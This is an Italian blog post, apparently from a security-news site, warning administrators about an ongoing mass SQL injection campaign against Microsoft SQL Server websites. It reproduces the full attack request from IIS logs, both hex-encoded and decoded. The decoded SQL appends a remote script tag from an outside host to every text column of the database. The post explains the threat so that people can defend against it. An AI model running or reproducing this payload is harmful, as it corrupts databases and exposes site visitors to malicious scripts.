Trusted source riporta la notizia di un nuovo attacco a Microsoft SQL Server.
L’attacco sarebbe partito la scorsa settimana e avrebbe già interessato migliaia di siti.
Se spulciate i log del vostro IIS potreste trovare una riga di questo tipo:
GET /?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520 4054207661726368617228323535292C4043207661726368617228343030302920 4445434C415245205461626C655F437572736F7220435552534F5220464F522073 656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563 747320612C737973636F6C756D6E73206220776865726520612E69643D622E6964 20616E6420612E78747970653D27752720616E642028622E78747970653D393920 6F7220622E78747970653D3335206F7220622E78747970653D323331206F722062 2E78747970653D31363729204F50454E205461626C655F437572736F7220464554 4348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C4043205748494C4528404046455443485F5354415455533D30292042454749 4E20657865632827757064617465205B272B40542B275D20736574205B272B4043 2B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420 7372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F77 2E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27 206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A 73223E3C2F7363726970743E3C212D2D272727294645544348204E455854204652 4F4D20205461626C655F437572736F7220494E544F2040542C404320454E442043 4C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C 655F437572736F72%20AS%20CHAR(4000));EXEC(@S);HTTP/1.1
Che altro non è che la codifica esadecimale di questa procedura SQL (senza i link ai siti che ospitano gli script):
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"> </title><script src="http://sdo.1000mg.cn/csrss/w.js"></script> <!--'' where '+@C+' not like ''%"></title> <script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
La sequenza SQL è abbastanza offuscata e, comunque, non è presente la parte di JavaScript che completa l’attacco l’URL del JavaScript non è più raggiungibile. Lo scopo dell’attaccante è di inserire nelle pagine visualizzate da un sito ritenuto affidabile del codice HTML che linka pagine di phishing o comunque di dubbia legalità. L’efficacia dell’attacco è aumentata dall’implicita fiducia che molti utenti hanno dei siti compromessi da questo attacco che stanno visitando.
Microsfot SQL Server è utilizzato da molte organizzazioni governative e da siti ritenuti affidabili dagli utenti; pertanto è bene aumentare il livello di attenzione anche quando si visitano certi siti ritenuti affidabili.
Un sistema per sapere senza fatica il tipo di server che state contattando è l’estensione di Firefox Server Spy.
In questo momento l’attacco è ancora in atto e ci sono molti siti compromessi, quindi prestate attenzione.
Leave a Reply